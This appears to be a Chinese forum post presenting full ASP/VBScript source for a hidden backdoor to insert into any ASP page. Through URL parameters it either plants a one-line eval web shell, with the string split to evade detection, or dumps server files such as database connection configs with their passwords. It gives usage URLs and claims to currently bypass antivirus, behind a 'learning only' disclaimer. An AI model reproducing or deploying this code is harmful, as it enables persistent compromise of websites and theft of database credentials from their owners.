自已动手写一个ASP的小后门
<%'这俩函数我不多解释,查查书和VBS的FSO相关内容. Function ReadtxtFiles(Filename) 'FSO读取文件的函数 Const ForReading = 1 Set ts = fso.OpenTextFile(Filename, ForReading) ReadtxtFiles = ts.ReadAll ts.Close End Function Sub CreateFile(Filename,temp) 'FSO写入文件的子程序 Set tf = fso.CreateTextFile(Filename, True) tf.write temp tf.Close End Sub
Dim Fso,tem1,VbStr,path '定义变量 Set fso = CreateObject("Scrip"&"ting.FileS"&"ystemOb"&"ject") '建立FSO对象 VbStr = Chr(13) & Chr(10) 'VBS回车换行符 if Request("pass")="f" then '如果输入的pass=f,则 if Request("path")<>"" then '如果path为空则 path="over.asp" '如果path为空,则默认为over.asp end if call CreateFile(server.mappath(path),"<%ev"&"al(req"&"uest(""#""))%" & ">") '写入海洋一句话木马. Response.Write("编译成功") '显示成功信息. Response.end end if If Request("pass")="e" then '如果输入pass=e 则 tem1 = ReadtxtFiles(server.mappath(Request("path"))) '读出文件内容,并在下面进行字符替换,以正常显示 tem1 = Replace(tem1,"<","<") tem1 = Replace(tem1,">",">") tem1 = Replace(tem1," "," ") tem1 = Replace(tem1,VbStr,"<br />") Response.Write tem1 '输出文件内容. End If %>
此后门可插入任意ASP文件,本身无后门功能.但是可以用它显示文件内容,比如数据库连接文件,也可以用它来生成后门.非常方便.
使用说明:
说明:程序本身无木马或后门功能。仅用于查看ASP源文件和生成海洋的后门文件(一句话马)。
免责:仅用于学习和交流使用,请勿用于非法用途.对使用此工具造成的一切后果,作者本人不承担任何责任有问题别问我 使用说明看不懂,建议去上小学二年级
使用范例:http://localhost/c.asp?pass=[e|f]&path=path
说明:参数pass:当值等于e为显示文件源代码,用于查看数据库地址和连接密码等时使用.当值等于f时写入一个海洋2006的后门文件,密码为"#" 参数path:路径.当pass=e时,path为需要显示文件的路径.当pass=f时,path为写入的后门地址,留空默认为over.asp. 示例:http://localhost/c.asp?pass=e&path=../inc/conn.asp
目前免杀。
页:
[1]
